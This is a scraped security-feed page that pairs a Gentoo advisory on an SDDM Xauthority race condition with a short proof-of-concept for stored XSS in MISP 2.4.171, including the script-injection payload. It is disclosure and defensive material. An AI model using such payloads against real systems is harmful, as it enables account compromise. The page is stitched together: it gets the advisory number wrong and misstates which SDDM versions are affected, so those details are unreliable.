Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-03

Gentoo Linux Security Advisory 202402-2 - A vulnerability has been discovered in SDDM which can lead to privilege escalation. Versions greater than or equal to 0.18.1-r6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: SDDM: Privilege Escalation  
     Date: February 03, 2024  
     Bugs: #753104  
       ID: 202402-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in SDDM which can lead to privilege  
escalation.

Background  
==========

SDDM is a modern display manager for X11 and Wayland sessions aiming to  
be fast, simple and beautiful. It uses modern technologies like QtQuick,  
which in turn gives the designer the ability to create smooth, animated  
user interfaces.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
x11-misc/sddm  < 0.18.1-r6   >= 0.18.1-r6

Description  
===========

A vulnerability has been discovered in SDDM. Please review the CVE  
identifier referenced below for details.

Impact  
======

SDDM passes the -auth and -displayfd command line arguments when  
starting the Xserver. It then waits for the display number to be  
received from the Xserver via the `displayfd`, before the Xauthority  
file specified via the `-auth` parameter is actually written. This  
results in a race condition, creating a time window in which no valid  
Xauthority file is existing while the Xserver is already running.

The X.Org server, when encountering a non-existing, empty or  
corrupt/incomplete Xauthority file, will grant any connecting client  
access to the Xorg display. A local unprivileged attacker can thus  
create an unauthorized connection to the Xserver and grab e.g. keyboard  
input events from other legitimate users accessing the Xserver.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All SDDM users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-misc/sddm-0.18.1-r6"

References  
==========

[ 1 ] CVE-2020-28049  
      https://nvd.nist.gov/vuln/detail/CVE-2020-28049

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-02

MISP version 2.4.171 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: MISP 2.4.171 Stored XSS [CVE-2023-37307] (Authenticated)# Date: 8th October 2023# Exploit Author: Mücahit Çeri# Vendor Homepage: https://www.circl.lu/# Software Link: https://github.com/MISP/MISP# Version: 2.4.171# Tested on: Ubuntu 20.04# CVE : CVE-2023-37307# Exploit:Logged in as low privileged account1)Click on the "Galaxies" button in the top menu2)Click "Add Cluster" in the left menu.3)Enter the payload "</title><script>alert(1)</script>" in the Name parameter.4)Other fields are filled randomly. Click on Submit button.5)When the relevant cluster is displayed, we see that alert(1) is running

Source

Packet Storm